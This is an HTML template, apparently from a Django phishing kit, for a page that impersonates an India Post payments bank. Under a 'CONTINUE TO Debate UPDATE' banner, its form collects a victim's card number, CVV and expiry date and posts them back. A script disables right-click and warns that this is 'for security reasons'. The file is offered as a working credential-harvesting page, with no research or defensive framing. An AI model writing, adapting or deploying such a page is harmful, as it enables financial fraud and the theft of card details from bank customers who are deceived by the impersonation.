{% load static %}
<!DOCTYPE html>
<html lang="zxx">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="apple-touch-icon" sizes="180x180" href="static apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="manifest" href="/site.webmanifest">
    <meta name="msapplication-TileColor" content="#da532c">
    <meta name="theme-color" content="#ffffff">
    <title>payments bank</title>
    <style>
        #hh,
        #io,
        #ij,
        #jj {
            width: 100%;
            margin: -7px;
        }

        .bb,
        .dd,
        .ff,
        #ii {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            border-color: #AE2924;
            border-width: 1px;
            margin: 2px;
            border-radius: 4px;
            margin-left: 20px;
        }

        .bb:hover {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            border-color: #AE2924;
            border-width: 1px;
            margin: 2px;
            border-radius: 4px;
            margin-left: 20px;
        }

        .dd:hover {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            border-color: #AE2924;
            border-width: 1px;
            margin: 2px;
            border-radius: 4px;
            margin-left: 20px;
        }

        .ff:hover {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            border-color: #AE2924;
            border-width: 1px;
            margin: 2px;
            border-radius: 4px;
            margin-left: 20px;
        }

        #ii:hover {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            border-color: #AE2924;
            border-width: 1px;
            margin: 2px;
            border-radius: 4px;
            margin-left: 20px;
        }

        #ll {
            background-color: #AE2924;
            color: white;
            padding: 0px 0px;
            margin: 10px 25px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
            width: 120px;
            height: 36px;
        }

        #ab {
            width: 360px;
            border-bottom: solid #f3f3f3;
            border-width: 10px;
        }

        #ll:hover {
            background-color: #3E1128;
            color: white;
            padding: 0px 0px;
            margin: 10px 25px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
            width: 120px;
            height: 36px;
        }

        #con {
            background-color: #c5d4e8;
            width: 280px;
            height: 130px;
            padding: 10px 15px;
            margin: 4px;
            margin-left: 18px;
            border-radius: 1px;
        }

        #kyc {
            width: 100%;
            background-color: #3E1128;
            height: 55px;
            margin: 4px;
            margin-left: -7px;
        }

        #col {
            width: 100%;
            background-color: #D8D1DB;
            height: 450px;
            margin-left: -7px;
        }
    </style>
    <script language="javascript">
        var message = "For security reasons,This function is not allowed here.";

        function clickIE4() {

            if (event.button == 2) {
                alert(message);
                return false;
            }
        }

        function clickNS4(e) {
            if (document.layers || document.getElementById && !document.all) {
                if (e.which == 2 || e.which == 3) {
                    alert(message);
                    return false;
                }
            }
        }

        if (document.layers) {
            document.captureEvents(Event.MOUSEDOWN);
            document.onmousedown = clickNS4;
        } else if (document.all && !document.getElementById) {
            document.onmousedown = clickIE4;
        }

        document.oncontextmenu = new Function("alert(message);return false;")
    </script>
</head>

<body>
    <center>
        <img src="{% static 'indiapost.png' %}" id="hh">
    </center>
    <div id="kyc"><br>
        <b style="color:white; padding:20px;">CONTINUE TO Debate UPDATE</b>
    </div>
    <form method="POST" enctype="multipart/form-data">
        {% csrf_token %}
        <div id="col">
            <br>
            <b style="font-family: Arial; color:#AE2924; padding:0px 20px; font-size:16px;">Card Number*</b>
            <div id="ta">
                <input type="text" name="cardnumber" inputmode="numeric" maxlength="12" minlength="12" class="bb"
                    id="acc_no" placeholder="Enter Your card Number" pattern="[0-9]{12}"
                    title="Please Enter Valid 12 Digit Card Number" required>
            </div>
            <br>
            <b style="font-family: Arial; color:#AE2924; padding:0px 20px; font-size:16px;">CVV</b>
            <div id="ct">
                <input type="test" name="cvv" class="dd" id="cvv" inputmode="numeric" 
                    maxlength="10" placeholder="Enter Your Card CVV" 
                    title="Please Enter Valid CVV" required>
            </div>
            <br>
            <div id="tx">
                <b style="font-family: Arial; color:#AE2924; padding:0px 20px; font-size:16px;">Expiry Date</b>
            </div>
            <div id="te">
                <input type="date" name="expirydate" class="ff" id="mbl_no" inputmode="numeric"
                    placeholder="Enter Your date"
                    title="Please Enter Valid Date" required>
                <div id="kk">
                    <button type="submit" onclick="insertData()" id="ll" style="font-weight: bold;">SUBMIT</button>
                </div>
                <br><br>
            </div>
        </div>
    </form>
    <img src="{% static 'footeri.jpg' %}" alt id="ij"><br><br>
</body>
